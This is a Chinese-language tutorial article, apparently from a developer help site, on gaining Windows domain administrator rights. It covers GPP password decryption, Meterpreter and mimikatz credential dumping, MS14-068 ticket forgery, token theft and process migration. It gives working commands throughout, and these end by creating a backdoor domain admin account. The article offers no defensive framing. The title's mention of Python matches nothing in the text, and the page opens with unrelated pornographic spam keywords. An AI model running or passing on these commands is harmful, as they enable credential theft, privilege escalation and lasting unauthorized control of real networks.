欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

Python安全獲取域管理員權(quán)限幾種方式操作示例

 更新時間:2021年10月14日 15:59:45   作者:Bypass--  
在不考慮直接攻擊域控的情況下,如何快速獲取域管理員權(quán)限呢?本文分享幾種常見的獲取域管理員權(quán)限的方式,有需要的朋友可以借鑒參考下

在大多數(shù)情況下,攻擊者可以通過定位域管理員所登錄的服務(wù)器,利用漏洞獲取服務(wù)器system權(quán)限,找到域管理的賬號、進程或是身份驗證令牌,從而獲取域管理員權(quán)限

第1種方式:利用GPP漏洞獲取域管理權(quán)限

SYSVOL是域內(nèi)的共享文件夾,用來存放登錄腳本、組策略腳本等信息。當域管理員通過組策略修改密碼時,在腳本中引入用戶密碼,就可能導(dǎo)致安全問題。

(1)訪問SYSVOL共享文件夾,搜索包含“cpassword”的XML文件,獲取AES加密的密碼。

4b72b7c4222da98a8e5825991de85814.png

(2)使用kali自帶的gpp-decrypt進行破解,從而獲取域賬號密碼,直接登錄域管理員賬號獲取訪問權(quán)限。

237666e53154570099b1472ea40cd200.png

第2種方式:獲取服務(wù)器明文登錄密碼

使用kiwi模塊需要system權(quán)限,所以我們在使用該模塊之前需要將當前MSF中的shell提升為system。提到system有兩個方法,一是當前的權(quán)限是administrator用戶,二是利用其它手段先提權(quán)到administrator用戶。然后administrator用戶可以直接getsystem到system權(quán)限。

meterpreter > getuid
Server username: BYPASS-E97BA3FC\Administrator
meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

加載kiwi模塊

load kiwi

列舉系統(tǒng)中的明文密碼

creds_all

97b51e59dcd9d68f3eb9cb87941650c5.png

第3種方式:使用MS14-068漏洞進行提權(quán)

MS14068是一個能夠使普通用戶提權(quán)到域控權(quán)限的權(quán)限提升漏洞。攻擊者可以通過構(gòu)造特定的請求包來達到提升權(quán)限的目的。

攻擊流程:

第一步:利用MS14-068偽造生成TGT

MS14-068.exe -u bypass@test.com -p abc123! -s S-1-5-21-735015318-3972860336-672499796 -d  dc.test.com

8c02d0b76173c974c5484b13d4f2de6c.png

第二步:利用mimikatz將工具得到的TGT票據(jù)寫入內(nèi)存,創(chuàng)建緩存證書

mimikatz#kerberos::ptc TGT_bypass@test.com.ccache

5b4f11d26249d8fd3dad35394b883804.png

第三步:獲取域管理員權(quán)限。創(chuàng)建一個 test 賬號并加入域管理員組,從而隨時可以登錄域控主機進行操作。

PsExec.exe \\dc cmd.exe 
// 添加test用戶
net user test abc123! /add /domain
// 把 test 用戶添加進域管理員組
net group "domain admins"  test /add /domain
// 查看域管理員
net group "domain admins" /domain

第4種方式:竊取域管理員令牌

當有域控賬戶登陸至服務(wù)器時可使用令牌模擬進行滲透取得域控權(quán)限。

1、入侵域管理員所在的服務(wù)器,竊取域管理員的令牌,從而控制整個域。

a65ff8fa740f2260619f860c45c585cc.png

2、直接在meterpreter shell上執(zhí)行添加域管理員

add_user test abc123! -h 域控的IP地址
add_group_user "Domain Admins" test -h 域控IP地址

第5種方式:進程遷移

入侵了域管理員所登錄的服務(wù)器,將進程遷移到域管理員所運行的進程,就可以獲得域管理員權(quán)限。

1、獲取域管理員列表

net group "Domain Admins" /domain

bfd69785de08b8e46907a938839d3f0b.png

2、利用ps找到域管理員(TEST\bypass)所運行的進程,然后將shell進程遷移到域管理員所運行的進程中,成功后就獲得了域管理員權(quán)限。如下圖所示:

53e1f5dc769310202e0938b1538f8fca.png

3、輸入shell命令獲取OS shell,在本機上使用Windows命令添加新的域管理員:

// 添加test用戶
net user test admin@123 /add /domain
// 把 test 用戶添加進域管理員組
net group "domain admins"  test /add /domain

4、成功添加了域管理員賬號test。

1a91aee99283c9716d6038fee51ea8da.png

以上就是Python安全獲取域管理員權(quán)限幾種方式操作示例的詳細內(nèi)容,更多關(guān)于Python獲取域管理員權(quán)限方式的資料請關(guān)注腳本之家其它相關(guān)文章!

相關(guān)文章

最新評論